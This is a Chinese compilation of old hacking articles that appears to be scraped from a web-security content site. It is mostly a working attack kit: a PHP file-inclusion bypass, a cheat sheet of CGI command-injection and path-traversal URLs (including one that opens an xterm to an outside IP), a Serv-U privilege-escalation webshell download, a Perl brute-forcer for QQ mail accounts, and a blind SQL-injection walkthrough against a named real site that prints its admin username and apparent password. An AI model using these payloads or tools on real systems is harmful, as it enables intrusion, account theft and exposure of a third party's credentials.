【简介】以下是小编收集整理的PhpCms sp6 SQL injection 0day脚本安全（共5篇），欢迎阅读与借鉴。在此，感谢网友“武豪莉”投稿本文！

很多php使用defined来防止外部直接访问php文件,从而保证了只让内部php文件include等调用，如下面：

//tag.php

if (!defined(“X”)) {

echo “You Cannot Access This Script. Directly, Have a Nice Day.”;

exit();

}

?>

这样的代码可以解决很多的安全问题，比如变量未定义[应该说在本文件内未定义]。

但是这样的在本地包含漏洞前就没什么意义了。比如进来看一代码

common.php文件里：

if ( !defined('X') )

{

die('Do not access this file directly.');

}

if ( !isset($root_path) )

{

$root_path = './';

}

require_once($root_path . 'config.php');

如果没有!defined('X') 的限制那么我们，这里$root_path未定义导致了一个远程包含，

而在改脚本又存在一个update-->include的2次攻击导致的本地包含，那么我们可以通过这个本地包含漏洞包含common.php导致突破!defined('X')，转化为远程包含。

总体思路，跳过限制，查看敏感文件和密码相关文件，写入一句话cgi，进后台试传webshell（后台如果加验证或者MD5过的时候，可以试着

cookies欺骗，本地提交），寻找可执行的目录和相关函数，拿shell…………》提权

感谢EMM和ps的睿智和他们高超的脚本技术，还有以前老红4的脚本群英和国外的那些牛淫们

注“

perl脚本的漏洞大多出在open()、system()或者 ''调用中。前者允许读写和执行，而后两个允许执行。

以POST的方法发送表格的话，就不能蒙混过关（%00将不会被解析），所以我们大部分用GET

target.com/cgi-bin/home/news/sub.pl?12 随意构造

target.com/cgi-bin/home/news/sub.pl?& 换个字符，也许可以执行呢

target.com/cgi-bin/home/news/sub.pl?`ls` 单引号

target.com/cgi-bin/home/news/sub.pl?`id`

target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`

target.com/cgi-bin/home/news/sub.pl?`cat<' ome1/siteadm/cgi-bin/home/news/sub.pl'`="">

target.com/test.pl;ls|

target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|

target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|

target.com/test.pl?'id' 类似''内的操作和命令执行自己构造

比如：cat<' ome1/siteadm/cgi-bin/home/news/test.pl'`="">

target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection

target.com/test.pl?&........ /../../etc/passwd

www.target.org/cgi-bin/club/scripts/userinfo.pl?user=./test 前面加./

www.target.org/cgi-bin/club/scripts/userinfo.pl?user=test%00 注意后面的 %00 别弄丢了

www.target.org/cgi-bin/club/scripts/userinfo.pl?user=../../../../etc/passwd%00

www.target.org/show.php?filename=../../../../../../../home/murong/include/config.php 查看php代码

www.target.org/show.php?filename=../../../../../../../home/murong/admin/global.php

emm和ps的一句话“

echo ”

www.target.org/cgi-bin/club/scripts/change_pw.pl?passwd0=1&passwd1=22&passwd2=22&key=../../../../../../../../bin/ls%20

>bbb%20|

www.target.org/cgi-bin/club/scripts\'less showpost.pl\' 并且寻找（用\'/\'）\'SELECT\' 字符串

www.target.org/cgi-bin/club/scripts/..%c0%af../..%c0%af../bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征

www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin

相关html为后缀的脚本技术，继续深挖中，但是不可质疑的是提交数据查询语句也是一种完美的方法

target.com/#cmd.exe

target.com/?dummyparam=xp_cmdshell

lynx target.com/cgi-bin/htmlscript?../../../../etc/passwd

PS：很久前整理asp注射和php注射大全都是私下给好友的，不知道哪个马甲不够意思，就发了出去，

现在满bbs和各动画站点都能看到，而且

作者乱七八糟， 幸亏吃亏以后，再整理或者写的其他文章技巧，只给几个特好的朋友。再也不敢乱发了，用pinke话说，“我写/发现个东西我

容易吗，不知道怎么就被人做成动画或者教程，拿来赚钱也罢了，还要留一句话，没什么技术，黑站就这么简单.” 鄙视这些人们……有本事你

们自己写个lcx，或者什么shell去？我写不来，但是用朋友的，我也心安理得

作者：linx

利用Serv-U的本地权限提升漏洞自动安装Hway!即使服务器的Serv-U密码被更改,只要ServUAdmin.exe可读,它便能读出更改后的密码.此外HWay && Serv-U.php还具有本地端口扫描的功能.

如果服务器的Serv-U的端口,密码都没有更改,那么直接点击”安装Hway”便可安装成功.否则请点击“获取Serv-U的管理员密码和端口”尝试获取更改后Serv-U的管理员密码和端口.

详细用法看压缩包内图文说明，

HWay && ServU.php脚本安全

，

blogimg.chinaunix.net/blog/upfile2/080712123643.rar

#!/usr/bin/perl

use Net::POP3;

$email=“pop.qq.com”;

$pop = Net::POP3->new($email)or die(“ERROR: Unable to initiate. ”);

print $pop->banner;

$pop->quit;

$i=0;

open(fp1,“user.txt”);

@array1=;

open(fp2,“pass.txt”);

@array2=;

foreach $a(@array1) {

$u=substr($a,0,length($a)-1);

$u=$u.“\@qq.com”;

foreach $b(@array2) {

$p=substr($b,0,length($b)-1);

print “cracked with ”.$u.“-----”.$p.“\n”;

$i=$i+1;

$pop = Net::POP3->new($email)or die(“ERROR: Unable to initiate. ”);

$m=$pop->login($u,$p);

if($m>0)

{

print $u.“------------”.$p.“----”.“success”.“\n”;

$pop->quit;

}

else

{

print $u.“------------”.$p.“----”.“failed”.“\n”;

$pop->quit;

}

}

}

print $i;

现在注入工具横行,自动化的程度已经...不能再自动了.

很多人会熟练的使用啊D,明小子之类的自动注入工具.以为自己就会了...

注入的原理呢.什么是注入.为什么会造成注入.过程...等.

你知道吗?你有没有试过真正的手工注入?没吧.

现在就利用我写的手工注入工具来讲解一下总体手工注入过程.

先找个有注入漏洞的站.很简单满大街都是.

www.jinhu168.com/A3/NewsInfo.asp?id=75

manage_User

username  admin

password  bfpms

id  35

已经找好了.这是一个标准欠黑型网站.安全度就不用说了.

www.jinhu168.com/A3/NewsInfo.asp?id=75

有注入漏洞的地址.检查一下.

基本确定可能有漏洞.继续.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and exists (select * from manage_User)

查询manage_User这个表名是否存在.

不好意思.这工具老出错...录制这个工具不怎么好用.有好用的有空介绍个啊....

好了继续.

manage_User 存在...页面返回正常...

名字改了下`不存在就返回错误的页面`

这里是给你填写提示语句用的`不用的话清空就行了.

继续.

返回正常.说明存在.继续.等等`听电话`

不好意思.

不是1位哦`回显错误.呵呵`5位的`回显正常`

这样我们就知道 他很多东西了`表..项..还有内容长度.

帐号的第一位的第一个字母不是1所以出错.

呵呵`帐号的第一位的第一个字母是a 正确...所以回显正常.

帐号是什么我想都不用怎么想了吧`5位数的admin

确实是的哦....哈哈.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and 1=(select count(*) from [manage_User] where left(username,5)='admin')

为了给大家学习.我把例句都提取出来了.和程序过程是一样的,大家可以研究下.

其他的密码等也是这种过程. 大家明白了吗?要难不是很难`只是要有耐心.如果简单的话就不会出现

全自动的注入工具了.

希望大家在使用我的工具的同时也能学到点东西.

★ 脚本范文

★ xss获取后台路径脚本安全

★ 数据库防脚本注入WEB安全

★ 注入笔记判断数据库脚本安全

★ 外国的注入技巧收集脚本安全

★ Web安全之SQL注入攻击脚本安全

★ 客户端无脚本攻击（Scriptless Attacks）脚本安全

★ 白帽子讲web安全?C浏览器安全脚本安全

★ IE8 xss filter bypass (xss过滤器绕过)脚本安全

★ 基于flash的反射型xss的利用方法脚本安全